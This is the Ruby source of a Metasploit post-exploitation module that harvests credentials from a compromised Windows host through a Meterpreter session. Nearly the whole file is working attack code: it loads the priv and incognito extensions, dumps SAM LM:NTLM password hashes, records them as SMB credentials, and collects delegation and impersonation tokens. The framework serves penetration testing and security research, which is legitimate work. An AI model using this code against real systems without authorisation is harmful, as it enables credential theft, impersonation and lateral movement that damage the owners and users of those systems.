GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/credential_collector.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
  # Supplies the reporting helpers (report_note, credential/login creation)
  # that #run uses to persist what it collects.
  include Msf::Auxiliary::Report

  # Registers module metadata: name, description, author, platform and
  # session type, stability notes, and the two Meterpreter commands
  # (incognito_list_tokens, priv_passwd_get_sam_hashes) that #run depends on.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Credential Collector',
        'Description' => %q{
          This module harvests credentials found on the host and stores them in the database.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'tebo[at]attackresearch.com'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              incognito_list_tokens
              priv_passwd_get_sam_hashes
            ]
          }
        }
      )
    )
  end

  # Module entry point. Two phases, both recorded in the workspace database:
  #   1. SAM hashes read via the priv extension, each stored as an :ntlm_hash
  #      credential plus an UNTRIED login attributed to SMB (tcp/445) on the
  #      session host.
  #   2. incognito delegation/impersonation tokens, each stored as an
  #      'smb_token' note.
  # Aborts with Failure::Unknown if the hash dump raises; ends via
  # Rex::Script::Completed if no token data is returned.
  def run
    # Prefer the Computer name from sysinfo; only shell out to `hostname`
    # when sysinfo is unavailable.
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    # Make sure we're rockin Priv and Incognito
    # Each extension is loaded only if the session does not already expose it.
    session.core.use('priv') if !session.priv
    session.core.use('incognito') if !session.incognito

    # It wasn't me mom! Stinko did it!
    # Any StandardError from the dump is converted into a descriptive module
    # failure (the message points at the usual cause: an architecture mismatch
    # between the host process and the target).
    begin
      hashes = client.priv.sam_hashes
    rescue StandardError
      fail_with(Failure::Unknown, "Error accessing hashes, did you migrate to a process that matched the target's architecture?")
    end

    # Target infos for the db record
    addr = session.session_host
    # client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)

    # Record hashes to the running db instance
    print_good('Collecting hashes...')

    hashes.each do |hash|
      # Build service information
      # Every credential and login below is attributed to SMB on tcp/445 of
      # the session host.
      service_data = {
        address: addr,
        port: 445,
        service_name: 'smb',
        protocol: 'tcp'
      }

      # Build credential information
      # private_data is the "LM:NTLM" pair, which is the layout the
      # :ntlm_hash private type expects.
      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: refname,
        private_type: :ntlm_hash,
        private_data: hash.lanman + ':' + hash.ntlm,
        username: hash.user_name,
        workspace_id: myworkspace_id
      }

      credential_data.merge!(service_data)
      credential_core = create_credential(credential_data)

      # Assemble the options hash for creating the Metasploit::Credential::Login object
      # Status is UNTRIED: the hash was harvested from the host, not validated
      # against the SMB service.
      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED,
        workspace_id: myworkspace_id
      }

      login_data.merge!(service_data)
      create_credential_login(login_data)

      # Console echo of what was just persisted (user:LM:NTLM).
      print_line " Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
    end

    # Record user tokens
    tokens = session.incognito.incognito_list_tokens(0)
    # No token data: stop here. Completed signals a normal end of the module
    # rather than an error.
    raise Rex::Script::Completed if !tokens

    # Meh, tokens come to us as a formatted string
    # Delegation and impersonation token lists are concatenated and split per
    # line; each line becomes one note.
    print_good 'Collecting tokens...'
    (tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
      data = {}
      data[:host] = addr
      data[:type] = 'smb_token'
      data[:data] = token
      # NOTE(review): :unique_data presumably makes report_note dedupe notes
      # carrying the same token string -- confirm against report_note.
      data[:update] = :unique_data

      print_line " #{data[:data]}"

      report_note(data)
    end
  end
end